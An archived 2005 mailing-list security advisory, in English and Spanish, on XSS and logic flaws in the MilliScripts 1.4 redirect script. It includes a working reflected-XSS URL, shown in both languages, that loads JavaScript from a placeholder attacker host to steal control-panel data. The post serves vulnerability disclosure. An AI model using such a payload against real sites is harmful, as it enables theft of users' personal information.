Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Milliscript 1.4 Multiple Vulnerabilities

from [NaPa] Network Security [Permanent Link]
Subject: [VulnWatch] Milliscript 1.4 Multiple Vulnerabilities
Date: Fri, 9 Dec 2005 14:14:04 -0600 


###################################################################
Full PDF Advisory: http://securitynation.com/files/sndown.php?id=22 english
                   http://securitynation.com/files/sndown.php?id=22 spanish
###################################################################

Multiple Bugs On MilliScripts 1.4 Redirection
http://www.milliscripts.at
Date: 01-Diciembre-2005
Researchers: Luis Alberto Cortes Zavala, Vicente Perez


1.-Overview

MilliScripts 1.4 Is a free redirect script for starting your own service of
subdomains, without any complex configuration at your Server and with so
many functions. For more information go to www.milliscripts.at

2.-Description

By all the source code there are a lot of bugs that can be found easily,
more of them are XSS, but is quite possible to have some PHP Injection,
however, you can lie to a user to try to open some malformed url, with his
control panel and get some personal information with XSS.
 
A Basic example is the var $domainname

http://www.server.net/red_14/register.php?do=register2&domainname=%22%3E%3Cs
cript%20src=http://serveratacker.com/script.js%3E%3C/script%3E&ext=somevalid
domain.net

So, we have other bugs founded on the code, like this next example, that is
a var, who decides the program flow, who is not set by when the users call
the function that is needed: 

if($autoappr == "on") { //some code}else{//some code}

$autoappr value is nothing, and is not declared before



3.- Disclosure Time Line
Vendor Contacted: 07-December-2005
Vendor Response: 09-December-2005

Vendor answer: the scripts are quite old, and they haven't been further
developed since a few years.


5.- Copyright

http://www.securitynation.com - Security Nation is a Lab Supported by RISS
Security Services.
http://www.riss.com.mx
luis.cortes@riss.com.mx
vicente.perez@riss.com.mx

############################################################################
#################
Spanish Version of Advisory
############################################################################
#################

Multiple Bugs On MilliScripts 1.4 Redirection
http://www.milliscripts.at
01-Diciembre-2005
Investigadores: Luis Alberto Cortes Zavala, Vicente Perez

1.-Vista Previa

MilliScripts 1.4 Es un script que permite abrir tu propio servicio de
redirección de subdominios, sin alterar registros absolutos en tu servidor,
es un script potente y con muchas funciones, suficientes par aponer un
servicio del estilo de cjb.net. Para mas información remitirse al sitio Web
www.milliscripts.at

2.-Descripción

A lo largo del sistema existen diferentes fallos y múltiples XSS, que son
fácilmente explotables, siendo este no un problema de inicio se puede
conseguir que un usuario abra su panel de control y obtener datos
confidenciales, así mismo no se descarta la posibilidad de inyección remota
de código PHP. 

Un ejemplo básico esta en la variable $domainname que es fácilmente
explotable:

http://www.server.net/red_14/register.php?do=register2&domainname=%22%3E%3Cs
cript%20src=http://serveratacker.com/script.js%3E%3C/script%3E&ext=somevalid
domain.net

Entre otros errores encontrados en el código se denota un ciclo, la
aplicación tiene la opción de autorizar usuarios nuevos o auto aprobarlos,
sin embargo en el código no esta correctamente implementado como se denota a
continuación:

if($autoappr == "on") { //some code}else{//some code}


En esta línea de código el flujo del programa se define de acuerdo al valor
de la variable, cosa que en la revisión del código es errónea ya que la
variable no tiene ningún valor al ser usada, de hecho ni siquiera existe en
la pila porque no había sido declarada en ningún momento.

3.- Tiempo de línea de Disclosure
Contacto con el Desarrollador: 07-Diciembre-2005
Respuesta del Desarrollador: 09-Diciembre-2005

El script es viejo y esta fuera de mantenimiento, sin embargo podemos
remitir la información técnica, probablemente saque alguna actualización si
se encuentra la necesidad.

5.- Copyright

http://www.securitynation.com - Security Nation is a Lab Supported by RISS
Security Services.
http://www.riss.com.mx
luis.cortes@riss.com.mx
vicente.perez@riss.com.mx
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Milliscript 1.4 Multiple Vulnerabilities, NaPa <=
Previous by Date:  [Full-disclosure] iDefense Security Advisory 12.09.05: Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability, labs-no-reply@idefense.com
Next by Date:  [Full-disclosure] iDEFENSE Security Advisory 12.12.05: SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability, labs-no-reply@idefense.com
Previous by Thread:  [Full-disclosure] iDefense Security Advisory 12.09.05: Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability, labs-no-reply@idefense.com
Next by Thread:  [Full-disclosure] iDEFENSE Security Advisory 12.12.05: SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability, labs-no-reply@idefense.com
Indexes:  [Date] [Thread] [Top] [All Lists]